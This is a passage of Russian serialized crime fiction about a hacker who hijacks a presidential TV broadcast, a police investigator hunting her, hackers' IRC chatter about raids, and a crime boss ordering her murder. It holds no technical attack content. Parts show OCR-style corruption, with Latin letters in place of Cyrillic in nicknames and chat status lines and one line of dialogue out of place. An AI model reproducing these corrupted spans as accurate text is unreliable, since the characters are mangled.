Повсюду разбросаны компьютерные журналы, старая мебель покрыта 
пылью, на полу - батареи пивных бутылок. Он даже не постарался приб- 
раться к ее приходу. СгіЬЫе заметил ее взгляд, удивленно осматрива- 
ющий обстановку, и попытался оправдаться: 

- Надо было бы прибраться, но последнее время была куча дел. Сама 
понимаешь. 

- Меня это не смущает. У самой дома постоянно беспорядок, - соврала 
Аня. 

Девушка подняла один из журналов, на котором большими буквами 
красовалась надпись «][акер», а ниже - фотография соблазнительной 
девицы с гаджетом на полуобнаженном теле. 

- Давно его не читала. Пишут что-то интересное? 

- Да так. Ерунду всякую. Сколько времени собираешься здесь пробыть? 

- Не знаю, Криб. У меня сейчас действительно неприятности, нужно ка- 
кое-то время, чтобы все обдумать. 

- Что-то серьезное? 

- Да. Ну а ты как? Чего в этой каморке ютишься? 




Весь день Антонов мотался как белка в колесе. Процедуры, показания, 
экспертиза - ему пришлось участвовать во всем этом, и только под ко- 
нец рабочего дня удалось вырваться. По словам соседей, в этой квар- 
тире действительно жила девушка, и ее приметы совпадали с примета- 
ми незнакомки, чуть было не сбившей их на лестнице. Антонов корил 
себя, что не остановил ее тогда. Люди также заверили, что их соседи 
были тихой, счастливой парой, никаких перебранок они не слышали, да 
и вообще непонятно, за что можно было убить такого приятного моло- 
дого человека. По всем признакам сработал профессионал, и не было 
никаких версий относительно мотива. Впрочем, это уже было не его де- 
ло. За работу взялись сотрудники по уголовным делам, а Антонов и 
Иван вернулись в свой компьютерный отдел. 

- Андрей, тебе звонили. Какой-то парень, сказал, что по поводу хакера, 
взломавшего эфир, - сообщил ему один из работников отдела. 

Он и забыл про него. Антонов тут же встрепенулся. Если этот парень 
знал домашний адрес АІкаесІ, он мог знать и где она сейчас. 

- Что он сказал? 

- Сказал, что перезвонит. 

- Когда? Он не сказал, когда он перезвонит? 

- Нет. 

Антонов пожалел, что не оставил ему свой мобильный. Что ж, остается 
теперь ждать, пока он перезвонит. Антонов подозревал, что убийство 
произошло не просто так. Люди, которые могли заказать взлом сети те- 
леканала, знали, что случай этот органы так просто не оставят. Лишние 
свидетели были ни к чему. И если эта девушка как-то причастна ко 
взлому, он собирался найти ее быстрее убийц. 
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* Торіс І5 'Муфела, Каспера и Слэша приняли! В Москве и Питере про- 
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ВСЕГО ЧЕРЕЗ НЕСКОЛЬКО СЕКУНД... 



водятся рейды. Всем быть начеку!' 

* 8е{ Ьу АН оп Зип ^п 06 09: 12:11 

* Огідіп баз іоіпесі #ІссІ 
Огідіп: Эй! Всем привет. 

Огідіп: Алло, есть кто живой? 

Огідіп: Я только что вернулся со Швейцарии. Отдохнул супер! Как отме- 
тили? 

Огідіп: #*&% л . Только заметил топик. КАК приняли?? 

АІі: Привет, Оридж. Сейчас народ не особо языком мелет. Новогодний 
взлом расшевелил осиное гнездо. Под раздачу попали все. 

Огідіп: Новогодний взлом? Так вы все-таки что-то похакали? 

АІі: Не мы. Кто именно, неизвестно. Ты не слышал? 

Огідіп: Да нет же. Я в Швейцарии все это время был, даже телек неког- 
да было глянуть. 

АІі: Кто-то взломал телевизионный эфир во время трансляции обраще- 
ния президента. Вставили фрагменты из прошедших терактов. Кто-то 
заработал бабки, а попал весь андеграунд. 

Огідіп: Нихрена себе. Кто это мог быть? 

АІі: Так тебе кто-то и скажет. 

Хопіх: Все друг друга подозревают. Ты, Оридж, тоже под подозрением, да. 
Огідіп: Да идите вы. Я в Швейцарии был. 

Хопіх: Ага. С Дедом Морозом ряженку пил :). 

Огідіп: А как Муфел-то попался? 

АІі: У него был срок условный за взлом сервака Самсунга. Последнее вре- 
мя он, конечно, не промышлял. Но пойди объясни это клоунам в погонах. 
Огідіп: А Каспер, Слэш? 

АІі: Все были в разработке, но ничего серьезного на них не было. 
Теперь идут разборы полетов: кто, где, что, когда. 

Хопіх: Я бы, Оридж, на твоем месте осел на дно на некоторое время. 
Огідіп: Да уж понятно. Что остальные? 

АІі: Да пока тьфу-тьфу. Многих, правда, давно не видно. Надеюсь, у них 
там все ок. 

Хопіх: Сейчас тут по телику, кстати, новости показывают, по поводу 
взлома как раз. 

Огідіп: Что говорят? 

Хопіх: Да бред полный. Как обычно. Ничего не известно, ведется след- 
ствие. А, во, упомянула про рейды. 

Огідіп: Да уж. Новости нужно искать не на телевидении точно. 

АІі: Да на форумах тоже ничего конкретного. Все суетятся, все друг дру- 
га подозревают. Говорят, ФСБ взялось за народ всерьез. 

Огідіп: Надо было остаться в Швейцарии еще на пару недель. 

Огідіп: Кто-то звонит. Пойду открою. 

АІі: Огідіп, туг? 

АІі: Эй! У тебя там все в порядке? 

АІі: Чувак, прекращай шутить. 

* Огідіп баз ціііі ІВС (Ріпд йтеоиі: 244 зесопсіз) 

08 . 01 . 

Кардинал и Матфей обедали в загородном доме у Кардинала, еда на столе 
была разнообразной и вкусной. 

- У тебя отличный повар, Саша. Одолжишь мне его как-нибудь? - Матфей 
подмигнул. - Или могу обменять на моего шофера. 

- Спасибо, Витя. Ты же знаешь, у меня не только замечательный повар, но 
и первоклассный шофер. 

Матфей был одним из немногих, кто называл Кардинала по имени. Их от- 
ношения вряд ли можно было назвать дружбой. Оба знали, что если будет 




нужно для дела, они перережут друг другу глотки. Но их интересы пока сов- 
падали, и каждый был другому выгоден. Поэтому Матфей изредка наносил 
дружеский визит к Кардиналу домой и они вместе ели и общались. В такие 
моменты можно было попросить о небольшой услуге, и чаще всего эти ус- 
луги оказывались уже на следующий день. 

Матфей был младше Кардинала на 1 0 лет. Но предприимчивости в нем бы- 
ло не меньше. Кардинал втайне восхищался своим гостем, который на пу- 
ти к большой власти убрал всех конкурентов. Хладнокровно, грамотно. Ка- 
залось, Матфей не боялся никого, и Кардиналу приходилось лишь догады- 
ваться о его реальных страхах. 

- Как дочка? - поинтересовался Кардинал. 

- Спасибо, замечательно. Передает тебе благодарность за игрушки. Ей 
особенно понравился тот зеленый динозавр. Она с ним ложится спать. 

- Рад слышать. 

Мужчины на какое-то время отвлеклись от разговоров и снова принялись 
за еду. 

- Ты, кстати, наблюдаешь за новостями вокруг этого... эм, не совсем удач- 
ного новогоднего выступления? - Матфей ухмыльнулся. 

- Да. Забавно. Как думаешь, найдут исполнителя? 

- Вряд ли. Если хакеры были профессионалами, они не оставили никаких 
следов. 

- Ты-то откуда знаешь? 

- Ну я как-то воспользовался хакерскими услугами. Шеф одной фирмы не 
захотел сотрудничать, пришлось объяснить ему, что он поступает глупо. Ха- 
кер достал все отчетности фирмы, в которых явно было видно сокрытие на- 
логов. Этого было достаточно, чтобы обанкротить фирму полностью. 

- Ну прям в ногу со временем. 

- Да, метод камня и дубины ушел в прошлое. 

- А как звали твоего хакера? 

- Мм... дай вспомнить... что-то вроде Алкадай или Алькиед. 

Кардинал напрягся. 

- Может быть, Алкаед? 

- Точно! Откуда ты знаешь? 

- Представляешь, тоже приходилось с ним работать. 

- Почему с ним? 

- Не понял? 

- Не с ним, с ней. Эго девчонка. Я не видел ее фотки, она очень скрытная. 
Но надеюсь, так же симпатична, как умна. 

Кардинал покраснел, в голове у него все перемешалось. 

- Откуда-откуда ты знаешь, что она девица? 

- Я сам лично разговаривал с ней по телефону. Когда мы обговаривали де- 
тали. Правда, один раз, но голосок у нее - это что-то. 

- Извини, Витя. Мне нужно сделать один звонок. 

- Да нет проблем. 

Кардинал встал из-за стола и направился в свой кабинет, где стоял выде- 
ленный телефон. Набрав номер, он нетерпеливо выждал гудки и, услышав 
голос в трубке, рявкнул: 

- Какого хрена ты мне навешал? Ты с кем в игры играешь, идиог? 

- Извините, Александр Ефимович, я не совсем понимаю... - последовала 
робкая попытка оправдаться. 

- Не понимаешь? Ах ты осел! Вы убрали не того! Мне нужна девка, понима- 
ешь, девка! 

- Девка? Я не... 

- АІкаеб - это женщина. Найди ее и убери. Даю тебе два дня. 

Кардинал бросил трубку. 



Продолжение в следующем номере. 




